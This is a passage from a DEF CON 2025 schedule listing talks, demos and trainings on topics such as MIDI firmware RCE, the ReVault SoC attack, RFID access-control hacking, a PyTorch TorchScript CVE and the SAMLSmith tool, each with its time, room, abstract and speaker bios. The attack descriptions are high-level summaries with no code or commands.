Return to Index    -    Add to Google    -    ics Calendar file

BBV - Saturday - 15:00-15:30 PDT


Title: Referral Beware, Your Rewards Are Mine
When: Saturday, Aug 9, 15:00 - 15:30 PDT
Where: LVCCWest-Level2-W229 - Map

Description:

Referral Rewards Programs Functionality that most probably view as boring and not worth the time looking at while hunting for bugs on a program. After a deep dive into the implementation of this functionality across dozens of programs, I found them to be hiding some very interesting bugs. My research uncovered various types of business logic flaws, race conditions, and even how the implementations created various client-side gadgets such as cookie-injection and client-side path traversal which could then be used as a part of a client-side chain. This research uncovered vulnerabilities in big name programs such as Instacart, PayPal and Robinhood.

SpeakerBio:  Whit "un1tycyb3r" Taylor, Rhino Security Labs

As a penetration tester for Rhino Security Labs, I bring over a decade of experience to the security industry. For the past two years, I have specialized in bug bounty hunting and penetration testing, focusing on web applications and recently expanding into Android application security. My work has resulted in vulnerability submissions to major companies, including Epic Games and PayPal.

Beyond my primary roles, I actively conduct security research on open-source projects and emerging web technologies. This research has led to the discovery of several CVEs, including a critical Unauthenticated Remote Command Execution (RCE) vulnerability in Appsmith Enterprise Edition.


Return to Index    -    Add to Google    -    ics Calendar file

DCT - Friday - 10:00-10:45 PDT


Title: Remote code execution via MIDI messages
When: Friday, Aug 8, 10:00 - 10:45 PDT
Where: LVCCWest-Level1-Hall3-Track 2 - Map

Description:

I’m sure you’ve heard of MIDI – it’s a protocol and file format that’s used to exchange audio generation data such as “note on” and “note off” events. But what if I told you that there’s a MIDI implementation out there in the wild that, when excited in just the right ways, can do stuff the original product designers never intended to do? In this talk, we’ll dive into the wonderful world that is hardware reverse engineering. We’ll explore what JTAG and UART are and how we can use them to hack modern digital devices. We’ll dump the firmware of a Yamaha music keyboard and discover what is essentially a backdoor in the MIDI implementation – and exploit it to play Bad Apple on the keyboard’s dot matrix LCD.

References:

Architecture of Yamaha entry-level synths MIDI specification MIDI SysEx ID allocation table ARM7TDMI Technical Reference Manual

SpeakerBio:  Anna portasynthinca3 Antonenko

Anna “porta” has been playing around with Arduinos and whatnots since about 2017, when she was 13 years old. She’s made countless hobbyist projects with AVR, STM32 and ESP32 microcontrollers to learn more about the wonderful world of digital electronics. Today, she’s a professional embedded firmware engineer with an interest in hardware reverse engineering, operating system development and distributed fault-tolerant systems.


Return to Index    -    Add to Google    -    ics Calendar file

MHV - Saturday - 16:30-16:59 PDT


Title: Resilient and Reconfigurable Maritime Comms.
When: Saturday, Aug 9, 16:30 - 16:59 PDT
Where: LVCCWest-Level2-W228 - Map

Description:

With the maritime industry handling a large portion of global trade, efficient, secure information transfer is essential. Technologies like unmanned aerial vehicles (UAVs), autonomous underwater vehicles (AUVs), and the Internet of Ships (IoS) are enhancing communication and operational efficiency, but they also pose security and network management challenges. Compromised IT systems can lead to easy access to operational technology (OT) networks, increasing the risk of zero-day attacks. This talk presents the current state of maritime comms and explore the feasibility of an SDN-SDR driven cross-layer framework using SATCOM infrastructure for a resilient and reconfigurable maritime comms in dynamic, resource-constrained environments.

SpeakerBio:  AviNash Srinivasan, US Naval Academy

Dr. Avinash Srinivasan is an Associate Professor in the Cyber Science department at the United States Naval Academy. He holds a Ph.D. and a Master's in Computer Science, and a Bachelor’s in Industrial Engineering. His research interests span the broad areas of cybersecurity and forensics. In particular, his research focuses on network security and forensics, security and forensics in cyber physical systems, and critical infrastructure, steganography and information hiding, cloud computing forensics challenges, and privacy and anonymity. Dr. Srinivasan has administered several grants from agencies including DoD/Navy, NSF, DoJ, DHS, and DoEd. He has published 55 papers in prestigious refereed conferences and journals including IEEE Transactions on Information Forensics and Security, INFOCOM, ICDCS, and ACM SAC. Dr. Srinivasan also holds a patent (Patent number: 11210396). He currently serves on the editorial board for IEEE Transactions on Cognitive Communications and Networking as an Associate Editor. Dr. Srinivasan is a Certified Ethical Hacker (CEH) and Computer Hacking Forensics Investigator (CHFI). He has trained civilians as well as local and state law enforcement personnel in the areas of Macintosh Forensics and Network Forensics.


Return to Index    -    Add to Google    -    ics Calendar file

DL - Friday - 10:00-10:45 PDT


Title: RETCON - Reticulum Embedded Turnkey Connection Operating Node
When: Friday, Aug 8, 10:00 - 10:45 PDT
Where: LVCCWest-Level2-W210 - Map

Description:
Introducing RETCON: a game-changer for mesh network users who prefer deployment over drudgery. Reticulum offers a scalable, fully customizable, and secure-by-design off-grid mesh network, but the config can be confusing, hard to manage, and hard to share with beginners. RETCON allows you to package a pre-made Reticulum config into ready-to-roll Raspberry Pi images. And it auto-detects hardware to magically mesh upon deployment. Perfect for when you need a secure resilient mesh network yesterday, like maker fests, festivals, community networks, or right here at DEFCON.
SpeakerBio:  Daniel "Varx" Beard

Daniel is a software engineer and entrepreneur specializing in medical device cybersecurity. He founded MedISAO and Cyberprotek, both acquired by MedCrypt in 2020. In his spare time, he likes to contribute to FOSS tools and tinker with embedded electronics.


Return to Index    -    Add to Google    -    ics Calendar file

DL - Friday - 09:00-09:45 PDT


Title: RETCON - Reticulum Embedded Turnkey Connection Operating Node
When: Friday, Aug 8, 09:00 - 09:45 PDT
Where: LVCCWest-Level2-W210 - Map

Description:
Introducing RETCON: a game-changer for mesh network users who prefer deployment over drudgery. Reticulum offers a scalable, fully customizable, and secure-by-design off-grid mesh network, but the config can be confusing, hard to manage, and hard to share with beginners. RETCON allows you to package a pre-made Reticulum config into ready-to-roll Raspberry Pi images. And it auto-detects hardware to magically mesh upon deployment. Perfect for when you need a secure resilient mesh network yesterday, like maker fests, festivals, community networks, or right here at DEFCON.
SpeakerBio:  Daniel "Varx" Beard

Daniel is a software engineer and entrepreneur specializing in medical device cybersecurity. He founded MedISAO and Cyberprotek, both acquired by MedCrypt in 2020. In his spare time, he likes to contribute to FOSS tools and tinker with embedded electronics.


Return to Index    -    Add to Google    -    ics Calendar file

DL - Saturday - 15:00-15:45 PDT


Title: RETINA - Realtime Electronic Threat and Intrusion Neutralization Apparatus
When: Saturday, Aug 9, 15:00 - 15:45 PDT
Where: LVCCWest-Level2-W212 - Map

Description:

RETINA is the very first retro video game built for reverse engineers. Do you want to start the analysis of that sample, but aren’t really in the mood? You can try RETINA for Commodore 64, which can be fully customized with your own sample so that during your game you will also perform the malware triage!

SpeakerBio:  Cesare "Red5heep" Pizzi

Cesare is a security researcher, analyst, and technology enthusiast. He develops software and hardware and tries to share this with the community. Mainly focused on low-level programming, he developed a lot of open-source software, sometimes hardware related and sometimes not. He does a lot of reverse engineering too. He likes to share his work when possible at conferences like DEF CON, Insomni'hack, and Nullcon. He is a contributor to several open-source security projects including TinyTracer, Volatility, OpenCanary, PersistenceSniper, Speakeasy, and CETUS, and is a CTF player.


Return to Index    -    Add to Google    -    ics Calendar file

DL - Saturday - 14:00-14:45 PDT


Title: RETINA - Realtime Electronic Threat and Intrusion Neutralization Apparatus
When: Saturday, Aug 9, 14:00 - 14:45 PDT
Where: LVCCWest-Level2-W212 - Map

Description:

RETINA is the very first retro video game built for reverse engineers. Do you want to start the analysis of that sample, but aren’t really in the mood? You can try RETINA for Commodore 64, which can be fully customized with your own sample so that during your game you will also perform the malware triage!

SpeakerBio:  Cesare "Red5heep" Pizzi

Cesare is a security researcher, analyst, and technology enthusiast. He develops software and hardware and tries to share this with the community. Mainly focused on low-level programming, he developed a lot of open-source software, sometimes hardware related and sometimes not. He does a lot of reverse engineering too. He likes to share his work when possible at conferences like DEF CON, Insomni'hack, and Nullcon. He is a contributor to several open-source security projects including TinyTracer, Volatility, OpenCanary, PersistenceSniper, Speakeasy, and CETUS, and is a CTF player.


Return to Index    -    Add to Google    -    ics Calendar file

DL - Friday - 16:00-16:45 PDT


Title: RETINA - Realtime Electronic Threat and Intrusion Neutralization Apparatus
When: Friday, Aug 8, 16:00 - 16:45 PDT
Where: LVCCWest-Level2-W211 - Map

Description:

RETINA is the very first retro video game built for reverse engineers. Do you want to start the analysis of that sample, but aren’t really in the mood? You can try RETINA for Commodore 64, which can be fully customized with your own sample so that during your game you will also perform the malware triage!

SpeakerBio:  Cesare "Red5heep" Pizzi

Cesare is a security researcher, analyst, and technology enthusiast. He develops software and hardware and tries to share this with the community. Mainly focused on low-level programming, he developed a lot of open-source software, sometimes hardware related and sometimes not. He does a lot of reverse engineering too. He likes to share his work when possible at conferences like DEF CON, Insomni'hack, and Nullcon. He is a contributor to several open-source security projects including TinyTracer, Volatility, OpenCanary, PersistenceSniper, Speakeasy, and CETUS, and is a CTF player.


Return to Index    -    Add to Google    -    ics Calendar file

DL - Saturday - 15:00-15:45 PDT


Title: rev.ng Decompiler
When: Saturday, Aug 9, 15:00 - 15:45 PDT
Where: LVCCWest-Level2-W210 - Map

Description:

Rev.ng is an open source static binary analysis framework and interactive decompiler for native code based on LLVM and QEMU. In our demo we will: [1] Introduce rev.ng and how to use it from the command line. [2] Decompile a simple program to syntactically valid C code that can be fed into other static analysis tools. [3] Showcase our automated whole-program type recovery on a stripped program without debug symbols, able to detect complex types, e.g. linked-lists. [4] Demonstrate the Python scripting capabilities. [5] Demonstrate our preliminary integration with LLMs to assign names to functions, types, and so on. All the examples will be released on GitHub and 100% reproducible using only open source software.

Speakers:Pietro Fezzardi,Alessandro Di Federico

SpeakerBio:  Pietro Fezzardi

Pietro is the CTO of rev.ng Labs, developing the rev.ng decompiler and reverse engineering framework. During his M.Sc. in mathematics, he started working on embedded systems programming. He received his PhD from Politecnico di Milano, working on automated bug-detection for high-level synthesis compilers for FPGA. He spent a short time at ARM in the research security group, working on fuzzing and static program analysis, before joining rev.ng. He is interested in program analysis, compilation, embedded systems programming, C++, free software, OpenStreetMap, juggling, and circus skills.

SpeakerBio:  Alessandro Di Federico

Alessandro is the co-founder of rev.ng Labs. He obtained his PhD from Politecnico di Milano with a thesis about rev.ng and has been working on making a product out of it since then. He has been speaking at key industry and academic security conferences such as DEF CON, Recon, the USENIX Security Symposium, and others. He is passionate about compilers, C++, free software, reverse engineering, privacy, OpenStreetMap, hitchhiking, and hiking in the Alps.


Return to Index    -    Add to Google    -    ics Calendar file

DL - Friday - 11:00-11:45 PDT


Title: rev.ng Decompiler
When: Friday, Aug 8, 11:00 - 11:45 PDT
Where: LVCCWest-Level2-W212 - Map

Description:

Rev.ng is an open source static binary analysis framework and interactive decompiler for native code based on LLVM and QEMU. In our demo we will: [1] Introduce rev.ng and how to use it from the command line. [2] Decompile a simple program to syntactically valid C code that can be fed into other static analysis tools. [3] Showcase our automated whole-program type recovery on a stripped program without debug symbols, able to detect complex types, e.g. linked-lists. [4] Demonstrate the Python scripting capabilities. [5] Demonstrate our preliminary integration with LLMs to assign names to functions, types, and so on. All the examples will be released on GitHub and 100% reproducible using only open source software.

Speakers:Pietro Fezzardi,Alessandro Di Federico

SpeakerBio:  Pietro Fezzardi

Pietro is the CTO of rev.ng Labs, developing the rev.ng decompiler and reverse engineering framework. During his M.Sc. in mathematics, he started working on embedded systems programming. He received his PhD from Politecnico di Milano, working on automated bug-detection for high-level synthesis compilers for FPGA. He spent a short time at ARM in the research security group, working on fuzzing and static program analysis, before joining rev.ng. He is interested in program analysis, compilation, embedded systems programming, C++, free software, OpenStreetMap, juggling, and circus skills.

SpeakerBio:  Alessandro Di Federico

Alessandro is the co-founder of rev.ng Labs. He obtained his PhD from Politecnico di Milano with a thesis about rev.ng and has been working on making a product out of it since then. He has been speaking at key industry and academic security conferences such as DEF CON, Recon, the USENIX Security Symposium, and others. He is passionate about compilers, C++, free software, reverse engineering, privacy, OpenStreetMap, hitchhiking, and hiking in the Alps.


Return to Index    -    Add to Google    -    ics Calendar file

DCT - Saturday - 14:30-15:15 PDT


Title: ReVault! Compromised by your Secure SoC
When: Saturday, Aug 9, 14:30 - 15:15 PDT
Where: LVCCWest-Level1-Hall3-Track 3 - Map

Description:

We all love security, right? And when we trust a security component to safeguard our most valuable assets such as passwords, key material and biometrics, we want to believe they're doing a good job at it. But what happens when this assumption is flawed, and the chip that was going to protect our assets turns against us?

In this talk we'll present the ReVault attack that targets the [REDACTED] chip embedded in over 100 different laptops models from [VENDOR]. We will demonstrate how a low privilege user can fully compromise the chip, plunder its secrets, gain persistence on its application firmware and even hack Windows back. Are you ready for the heist?

SpeakerBio:  Philippe "phLaul" Laulheret, Senior Vulnerability Researcher at Cisco Talos

Philippe Laulheret is a Senior Vulnerability Researcher at Cisco Talos. With a focus on Reverse Engineering and Vulnerability Research, Philippe uses his background in Embedded Security and Software Engineering to poke at complex systems and get them to behave in interesting ways. Philippe presented multiple projects covering hardware hacking, reverse engineering and exploitation at DEF CON, Hardwear.io, Eko Party and more. In his spare time, Philippe enjoys playing CTFs, immersing himself in the beauty of the Pacific Northwest, and exploring the realm of Creative Coding. Philippe holds a MSc in Computer Science from Georgia Tech and a MSc in Electrical and Computer Engineering from Supélec (France).


Return to Index    -    Add to Google    -    ics Calendar file

TRN - Tuesday - 08:00-16:59 PDT


Title: RFID and Electronic Physical Access Control System Hacking
When: Tuesday, Aug 12, 08:00 - 16:59 PDT
Where: LVCCWest - Map

Description:

Practical security is the foundation of any security model. Beyond firewalls and network hardening, government and enterprise alike must consider how security infrastructure safeguards digital, material, and human assets. Physical security is foundational to the ability to resist unauthorized access or malicious threat.

In this training developed by world-renowned access-control expert Babak Javadi, students will be immersed in the mysteries of PACS tokens, RFID credentials, readers, alarm contacts, tamper switches, door controllers, and back-haul protocols that underpin Physical Access Control Systems (PACS) across the globe. The course provides a holistic and detailed view of modern access control and outlines common design limitations that can be exploited. Penetration testers will gain a practical understanding of what PACS looks like in the field, and how to intercept, clone, downgrade, replay, and bypass one's way through the system. Defenders, designers, and directors will come with away with best practices and techniques that will resist attacks.

Participation will include hands-on practical experience with tools, exploits, and refined methods for compromising modern Physical Access Control Systems.

Speakers:Deviant Ollam,Bryan Black,Babak Javadi

SpeakerBio:  Deviant Ollam, Director of Education at Red Team Alliance

While paying the bills as a physical penetration specialist with The CORE Group and the Director of Education for Red Team Alliance, Deviant Ollam also sat on the Board of Directors of the US division of TOOOL -- The Open Organisation Of Lockpickers -- for 14 years... acting as the the nonprofit's longest-serving Boardmember. His books Practical Lock Picking and Keys to the Kingdom are among Syngress Publishing's best-selling pen testing titles. In addition to being a lockpicker, Deviant is also a SAVTA certified Professional Safe Technician, a GSA certified Safe and Vault Inspector, member of the International Association of Investigative Locksmiths, a Life Safety and ADA consultant, and an NFPA Fire Door Inspector. At multiple annual security conferences Deviant started Lockpick Village workshop areas, and he has conducted physical security training sessions for Black Hat, the SANS Institute, DeepSec, ToorCon, HackCon, ShakaCon, HackInTheBox, ekoparty, AusCERT, GovCERT, CONFidence, the FBI, the NSA, DARPA, the National Defense University, Los Alamos National Lab, the United States Naval Academy at Annapolis, and the United States Military Academy at West Point.

In his limited spare time, Deviant enjoys loud moments with lead acceleration and quiet times with podcasts. He arrives at airports too early and shows up at parties too late, but will promptly appear right on time for tacos or whiskey.

SpeakerBio:  Bryan Black, Red Team Alliance

Bryan Black is a seasoned physical security professional and esteemed assessment specialist with a comprehensive expertise spanning various facets of site security. His areas of specialization encompass video surveillance, intrusion detection/prevention, access control, network infrastructure, and penetration testing. With an illustrious track record of over a decade, he has collaborated closely with local and state law enforcement, federal and intelligence agencies, as well as prominent private sector corporations. Through these partnerships, he has been instrumental in advising clients and businesses on navigating the constantly evolving threat landscape. He is frequently acknowledged for his discerning critique of prevailing installations and practices within the industry. During his leisure hours, he leverages his engineering background and personal maker space to engage in product development. His endeavors encompass the meticulous design and refinement of innovative tools and procedures aimed at optimizing the efficiency and efficacy of both red and blue team engagement protocols.

SpeakerBio:  Babak Javadi, Red Team Alliance

Babak Javadi is the President and Founder of The CORE Group, and one of the original co-founding Directors of TOOOL, The Open Organisation of Lockpickers. As a keystone member of the security industry, he is well-recognized expert in professional circles hacker community. Babak's expertise extends to a wide range of security disciplines ranging from high security mechanical cylinders to alarm systems & physical access control systems. Over the past fifteen years Babak has presented and provided trainings a wide range of commercial and government agencies, including Black Hat, The SANS Institute, the USMA at West Point, and more.


Return to Index    -    Add to Google    -    ics Calendar file

TRN - Monday - 08:00-16:59 PDT


Title: RFID and Electronic Physical Access Control System Hacking
When: Monday, Aug 11, 08:00 - 16:59 PDT
Where: LVCCWest - Map

Description:

Practical security is the foundation of any security model. Beyond firewalls and network hardening, government and enterprise alike must consider how security infrastructure safeguards digital, material, and human assets. Physical security is foundational to the ability to resist unauthorized access or malicious threat.

In this training developed by world-renowned access-control expert Babak Javadi, students will be immersed in the mysteries of PACS tokens, RFID credentials, readers, alarm contacts, tamper switches, door controllers, and back-haul protocols that underpin Physical Access Control Systems (PACS) across the globe. The course provides a holistic and detailed view of modern access control and outlines common design limitations that can be exploited. Penetration testers will gain a practical understanding of what PACS looks like in the field, and how to intercept, clone, downgrade, replay, and bypass one's way through the system. Defenders, designers, and directors will come with away with best practices and techniques that will resist attacks.

Participation will include hands-on practical experience with tools, exploits, and refined methods for compromising modern Physical Access Control Systems.

Speakers:Deviant Ollam,Bryan Black,Babak Javadi

SpeakerBio:  Deviant Ollam, Director of Education at Red Team Alliance

While paying the bills as a physical penetration specialist with The CORE Group and the Director of Education for Red Team Alliance, Deviant Ollam also sat on the Board of Directors of the US division of TOOOL -- The Open Organisation Of Lockpickers -- for 14 years... acting as the the nonprofit's longest-serving Boardmember. His books Practical Lock Picking and Keys to the Kingdom are among Syngress Publishing's best-selling pen testing titles. In addition to being a lockpicker, Deviant is also a SAVTA certified Professional Safe Technician, a GSA certified Safe and Vault Inspector, member of the International Association of Investigative Locksmiths, a Life Safety and ADA consultant, and an NFPA Fire Door Inspector. At multiple annual security conferences Deviant started Lockpick Village workshop areas, and he has conducted physical security training sessions for Black Hat, the SANS Institute, DeepSec, ToorCon, HackCon, ShakaCon, HackInTheBox, ekoparty, AusCERT, GovCERT, CONFidence, the FBI, the NSA, DARPA, the National Defense University, Los Alamos National Lab, the United States Naval Academy at Annapolis, and the United States Military Academy at West Point.

In his limited spare time, Deviant enjoys loud moments with lead acceleration and quiet times with podcasts. He arrives at airports too early and shows up at parties too late, but will promptly appear right on time for tacos or whiskey.

SpeakerBio:  Bryan Black, Red Team Alliance

Bryan Black is a seasoned physical security professional and esteemed assessment specialist with a comprehensive expertise spanning various facets of site security. His areas of specialization encompass video surveillance, intrusion detection/prevention, access control, network infrastructure, and penetration testing. With an illustrious track record of over a decade, he has collaborated closely with local and state law enforcement, federal and intelligence agencies, as well as prominent private sector corporations. Through these partnerships, he has been instrumental in advising clients and businesses on navigating the constantly evolving threat landscape. He is frequently acknowledged for his discerning critique of prevailing installations and practices within the industry. During his leisure hours, he leverages his engineering background and personal maker space to engage in product development. His endeavors encompass the meticulous design and refinement of innovative tools and procedures aimed at optimizing the efficiency and efficacy of both red and blue team engagement protocols.

SpeakerBio:  Babak Javadi, Red Team Alliance

Babak Javadi is the President and Founder of The CORE Group, and one of the original co-founding Directors of TOOOL, The Open Organisation of Lockpickers. As a keystone member of the security industry, he is well-recognized expert in professional circles hacker community. Babak's expertise extends to a wide range of security disciplines ranging from high security mechanical cylinders to alarm systems & physical access control systems. Over the past fifteen years Babak has presented and provided trainings a wide range of commercial and government agencies, including Black Hat, The SANS Institute, the USMA at West Point, and more.


Return to Index    -    Add to Google    -    ics Calendar file

PAYV - Friday - 12:00-12:30 PDT


Title: Risk and payments across the ecosystem
When: Friday, Aug 8, 12:00 - 12:30 PDT
Where: LVCCWest-Level1-Hall2-W505 - Map

Description:

This talk explores risk & payments from different POVs: Ecomm, recurring, two-sided marketplace, card issuer. What merchants & the business perceive as risk, max tail loss, can be very different for each. These perceptions of risk and economic incentives drive hugely different behaviours.

SpeakerBio:  Gary Kao
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

DL - Saturday - 13:00-13:45 PDT


Title: Robin - The Archaeologist of the Dark Web
When: Saturday, Aug 9, 13:00 - 13:45 PDT
Where: LVCCWest-Level2-W209 - Map

Description:

When exploring the dark web for OSINT or CTI investigations, you may be overwhelmed with numerous onion links, questionable marketplaces, and numerous search engines. With time constraints, how do you make sense of all this information and prioritize what truly matters? Enter Robin, an AI-powered dark web OSINT tool to streamline your investigations. Robin takes your query, automatically searches across multiple dark web search engines, scrapes relevant onion sites, and uses AI to generate clear, actionable investigative summaries. No more juggling five different tools or wasting hours validating dead links. In this tool demo, I’ll walk you through the real pain points of today’s dark web OSINT tools and show how Robin was built to solve them. I’ll cover the architecture, the scraping and summarization pipeline, and how Robin fits into real-world investigation workflows. I’ll also discuss future developments and how you can get involved. By the end of this talk, you will have a fresh perspective on dark web OSINT, a practical tool to use right away, and insights into how AI can simplify your dark web investigative process.

SpeakerBio:  Apurv "ASG_Sc0rpi0n" Singh Gautam

Apurv is a cybercrime researcher working as a senior threat research analyst at Cyble. He is focused on monitoring and analyzing a wide spectrum of sources, creating automated tools, and performing threat investigations by utilizing HUMINT, SOCMINT, and OSINT and producing threat intelligence. He has contributed to the latest SANS Institute's course FOR589 on Cybercrime Intelligence and is a contributing member of Curated Intel. He has delivered talks and workshops at national and international conferences like SANS OSINT Summit, SANS Cyber Defense Forum, DEF CON Blue Team Village, BSides Singapore, RootCon, and others. He is featured in major podcasts like ITSPMagazine and Tech Talks with Singh. He is passionate about giving back to the community and helping others get into this field, and has delivered many talks and workshops in schools and colleges. He loves volunteering with StationX to help students navigate into cybersecurity. In the past, he has also volunteered as a darknet researcher at CTI League and the EBCS darknet analysis group. He holds a master's degree in information security from Georgia Institute of Technology. He looks forward to the end of the day to play and stream one of the AAA games, Rainbow 6 Siege.


Return to Index    -    Add to Google    -    ics Calendar file

DL - Friday - 15:00-15:45 PDT


Title: Robin - The Archaeologist of the Dark Web
When: Friday, Aug 8, 15:00 - 15:45 PDT
Where: LVCCWest-Level2-W211 - Map

Description:

When exploring the dark web for OSINT or CTI investigations, you may be overwhelmed with numerous onion links, questionable marketplaces, and numerous search engines. With time constraints, how do you make sense of all this information and prioritize what truly matters? Enter Robin, an AI-powered dark web OSINT tool to streamline your investigations. Robin takes your query, automatically searches across multiple dark web search engines, scrapes relevant onion sites, and uses AI to generate clear, actionable investigative summaries. No more juggling five different tools or wasting hours validating dead links. In this tool demo, I’ll walk you through the real pain points of today’s dark web OSINT tools and show how Robin was built to solve them. I’ll cover the architecture, the scraping and summarization pipeline, and how Robin fits into real-world investigation workflows. I’ll also discuss future developments and how you can get involved. By the end of this talk, you will have a fresh perspective on dark web OSINT, a practical tool to use right away, and insights into how AI can simplify your dark web investigative process.

SpeakerBio:  Apurv "ASG_Sc0rpi0n" Singh Gautam

Apurv is a cybercrime researcher working as a senior threat research analyst at Cyble. He is focused on monitoring and analyzing a wide spectrum of sources, creating automated tools, and performing threat investigations by utilizing HUMINT, SOCMINT, and OSINT and producing threat intelligence. He has contributed to the latest SANS Institute's course FOR589 on Cybercrime Intelligence and is a contributing member of Curated Intel. He has delivered talks and workshops at national and international conferences like SANS OSINT Summit, SANS Cyber Defense Forum, DEF CON Blue Team Village, BSides Singapore, RootCon, and others. He is featured in major podcasts like ITSPMagazine and Tech Talks with Singh. He is passionate about giving back to the community and helping others get into this field, and has delivered many talks and workshops in schools and colleges. He loves volunteering with StationX to help students navigate into cybersecurity. In the past, he has also volunteered as a darknet researcher at CTI League and the EBCS darknet analysis group. He holds a master's degree in information security from Georgia Institute of Technology. He looks forward to the end of the day to play and stream one of the AAA games, Rainbow 6 Siege.


Return to Index    -    Add to Google    -    ics Calendar file

DCT - Friday - 17:30-17:50 PDT


Title: Rusty pearls: Postgres RCE on cloud databases
When: Friday, Aug 8, 17:30 - 17:50 PDT
Where: LVCCWest-Level1-Hall3-Track 1 - Map

Description:

In this session, we will delve into CVE-2024-10979, discovered by Varonis Threat Labs, and explain how it can be exploited to execute arbitrary code on cloud-hosted databases. Join us to gain insights into this significant Remote Code Execution (RCE) vulnerability and learn strategies for defending and testing managed databases for vulnerabilities.

References:

Speakers:Tal "TLP" Peleg,Coby Abrams

SpeakerBio:  Tal "TLP" Peleg

Tal Peleg, also known as TLP, is a senior security researcher and cloud security team lead at Varonis. He is a full-stack hacker with experience in malware analysis, Windows domains, SaaS applications, and cloud infrastructure. His research is currently focused on cloud applications and APIs.

SpeakerBio:  Coby Abrams

Coby Abrams is a cloud security researcher at Varonis, specializing in Azure and IaaS research, and in-depth overviews of various services. He brings over five years of experience in various types of security research.


Return to Index    -    Add to Google    -    ics Calendar file

DCT - Friday - 12:00-12:45 PDT


Title: Safe Harbor or Hostile Waters: Unveiling the Hidden Perils of the TorchScript Engine in PyTorch
When: Friday, Aug 8, 12:00 - 12:45 PDT
Where: LVCCWest-Level1-Hall3-Track 3 - Map

Description:

PyTorch is a machine learning library based on the Torch library, used for applications such as computer vision and natural language processing. It is one of the most popular deep learning frameworks.

However, beneath its powerful capabilities lies a potential security risk. Initially, PyTorch used pickle to save models, but due to the insecurity of pickle deserialization, there was a risk of Remote Code Execution (RCE) when loading models. Subsequently, PyTorch introduced the weights_only parameter to enhance security. The official documentation states that weights_only=True is considered safe and recommends using it over weights_only=False.

For years, the security of weights_only=True remained unchallenged. Our research, however, uncovered unsettling truths. We discovered that torch.load with weights_only=True supports TorchScript, leading us to delve into TorchScript's inner workings. After a period of research, we discovered several vulnerabilities and ultimately achieved RCE. We promptly reported this finding to PyTorch, who acknowledged the vulnerability and assigned us CVE-2025-32434. This revelation overturns established understandings and has profound implications for numerous AI applications. We will provide an in-depth analysis of the impact of this vulnerability.

In this sharing, we will introduce how we gained inspiration and discovered this interesting vulnerability. Meanwhile, our findings once again confirm the statement, "The Safe Harbor you once thought was actually Hostile Waters."

Speakers:Ji'an "azraelxuemo" Zhou,Lishuo "ret2ddme" Song

SpeakerBio:  Ji'an "azraelxuemo" Zhou

Ji'an Zhou is a Security Engineer in Alibaba Cloud. He is focusing on Java security and cloud native security and his work helped many high-profile vendors improve their products' security, including Google, Amazon, Cloudera, IBM, Microsoft, Oracle. He has previously spoken at Black Hat , Zer0Con, Off-by-One Con.

SpeakerBio:  Lishuo "ret2ddme" Song

Li'shuo Song is a Security Engineer at Alibaba Cloud. He focuses on browser security and has found several security bugs in Google Chrome.


Return to Index    -    Add to Google    -    ics Calendar file

ICSV - Friday - 10:00-10:30 PDT


Title: Safeguarding the Industrial Frontier: OT SOC & Incident Response
When: Friday, Aug 8, 10:00 - 10:30 PDT
Where: LVCCWest-Level2-W232 - Map

Description:

As the digital and physical worlds converge, Operational Technology (OT) environments face unprecedented cyber threats, demanding a specialized approach to security. This panel will delve into the critical realm of OT Security Operations Centers (SOCs) and incident response, exploring how organizations can effectively detect, respond to, and recover from cyberattacks targeting industrial control systems. We'll discuss the unique challenges of securing OT, best practices for building resilient SOC capabilities, and strategies for navigating complex incident response scenarios to ensure operational continuity and safety in our increasingly interconnected industrial landscape.

SpeakerBio:  Adam Robbie, Palo Alto Networks

Adam Robbie Head of OT Security Research, Palo Alto Networks
Adam is the Head of OT Security Research at Palo Alto Networks since 2022 with over 10 years of experience in both OT and IT industries. Publisher and author with SANS, IEEE, and other journals and conferences. His ambition is about contributing to secure our critical infrastructure, search for recent vulnerabilities, develop best practices and lead new initiatives. Adam has a Bachelor and Master of Science in Electrical Engineering. Additionally, he obtained advanced certifications including the Global Industrial Cyber Security Professional (GICSP) and GIAC Response and Industrial Defense (GRID) certifications. In addition to his technical expertise, He has a strong background in leadership and education. As an Adjunct Professor, he has been teaching cybersecurity bootcamp at The George Washington University, University of Michigan, University of Wisconsin, and other universities. Through these roles, he has successfully mentored and guided students, encouraging them to excel in the field of cybersecurity. Additionally, he served as an advisor for developing cybersecurity curriculum across different universities.

During his tenure as a Senior Cyber Security Consultant at Deloitte, he gained extensive experience in performing ICSIoT penetration testing, threat hunting, risk assessment, and vulnerability research. Furthermore, he has actively contributed to enhancing detection systems through advanced research and creation of security use cases.


Return to Index    -    Add to Google    -    ics Calendar file

DL - Friday - 09:00-09:45 PDT


Title: SAMLSmith
When: Friday, Aug 8, 09:00 - 09:45 PDT
Where: LVCCWest-Level2-W212 - Map

Description:

SAMLSmith is the go-to tool for penetrating SAML applications with response forging. An evolution of the original tooling developed for proof-of-concept of SAML response forging in Entra ID, SAMLSmith is the product of continued research on SAML. While far from new, enterprises continue to not prioritize the security of how SaaS applications integrate or understand best practices for securing them. With many factors at play, SAML response forging can range from extremely difficult to near impossible for a SOC to detect. SAMLSmith has a lot of tricks up its sleeve, including: [1] Multiple identity provider response forging. [2] AD FS specific response forging mode. [3] SAML request processing. [4] InResponseTo support. SAMLSmith can be used in several response forging scenarios where the private key material can be obtained. In demonstration of use, we’ll explore using SAMLSmith for performing a Golden SAML attack against AD FS. Further, we’ll demonstrate the use of SAMLSmith that ties into new research around response forging, penetrating certain types of SaaS applications with even more stealth.

Speakers:Eric Woodruff,Tomer Nahum

SpeakerBio:  Eric Woodruff

Eric is the chief identity architect for Semperis. He previously was a member of the security research and product teams. Prior to Semperis, he worked as a security and identity architect at Microsoft partners, spent time at Microsoft as a senior premier field engineer, and spent almost 15 years in the public sector, with 10 of them as a technical manager. He is a Microsoft MVP for security, recognized for his expertise in the Microsoft identity ecosystem. He is a strong proponent of knowledge sharing and spends a good deal of time sharing his insights and expertise at conferences as well as through blogging. He further supports the professional security and identity community as an IDPro member, working as part of the IDPro Body of Knowledge committee.

SpeakerBio:  Tomer Nahum, Security Researcher at Semperis

Tomer is a security researcher at Semperis, where he works to find new attacks and how to defend against them in on-prem identity stacks such as Active Directory, as well as cloud identity systems. He was awarded Most Valuable Researcher (MVR) in 2023 by Microsoft Security Response Center (MSRC).


Return to Index    -    Add to Google    -    ics Calendar file

DL - Friday - 10:00-10:45 PDT


Title: SAMLSmith
When: Friday, Aug 8, 10:00 - 10:45 PDT
Where: LVCCWest-Level2-W212 - Map

Description:

